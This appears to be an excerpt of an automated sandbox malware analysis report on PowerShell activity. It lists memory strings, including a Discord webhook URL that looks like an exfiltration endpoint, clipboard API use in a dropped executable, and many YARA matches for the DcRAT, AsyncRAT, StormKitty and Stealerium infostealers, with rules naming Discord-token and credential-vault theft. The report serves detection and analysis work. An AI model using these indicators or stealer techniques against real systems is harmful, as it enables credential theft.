            Source: powershell.exe, 00000000.00000002.2225680546.0000025C42951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
            Source: powershell.exe, 00000000.00000002.2225680546.0000025C4296A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169AFBC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000008.00000002.2248203691.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
            Source: powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.000000000525B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
            Source: powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.2177596881.00000169B07F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000003.00000002.2209534008.00000169BFC31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2209534008.00000169BFD73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_seeaCould

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D390DA OpenClipboard,5_2_00D390DA
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D33450 GlobalAlloc,GlobalLock,StringFromGUID2,wsprintfW,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00D33450
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D32EF0 GlobalAlloc,GlobalLock,StringFromGUID2,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00D32EF0

            System Summary

            barindex
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: dump.pcap, type: PCAPMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 8.2.powershell.exe.525bde2.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 8.2.powershell.exe.4f9a7a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 8.2.powershell.exe.503ed84.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 8.2.powershell.exe.503a820.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 8.2.powershell.exe.4f6df4c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 8.2.powershell.exe.503ed84.1.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 8.2.powershell.exe.4f9a7a0.2.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 2180, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 8.2.powershell.exe.8660000.8.raw.unpack, Knvbl.csLong String: Length: 14748
            Source: 8.2.powershell.exe.4f6df4c.3.raw.unpack, Knvbl.csLong String: Length: 14748
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\iviewers.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\Package.exeJump to dropped file
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D396345_2_00D39634
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_6E2FE1355_2_6E2FE135
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04721D688_2_04721D68
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04721E6A8_2_04721E6A
            Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\Package.exe A4F53964CDDDCCCBD1B46DA4D3F7F5F4292B5DD11C833D3DB3A1E7DEF36DA69A
            Source: C:\Windows\Temp\Package.exeCode function: String function: 6E2F19E0 appears 35 times
            Source: C:\Windows\Temp\Package.exeCode function: String function: 00D3F3E2 appears 34 times
            Source: C:\Windows\Temp\Package.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 204
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: dump.pcap, type: PCAPMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 8.2.powershell.exe.525bde2.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 8.2.powershell.exe.4f9a7a0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 8.2.powershell.exe.503ed84.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 8.2.powershell.exe.503a820.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 8.2.powershell.exe.4f6df4c.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 8.2.powershell.exe.503ed84.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 8.2.powershell.exe.4f9a7a0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
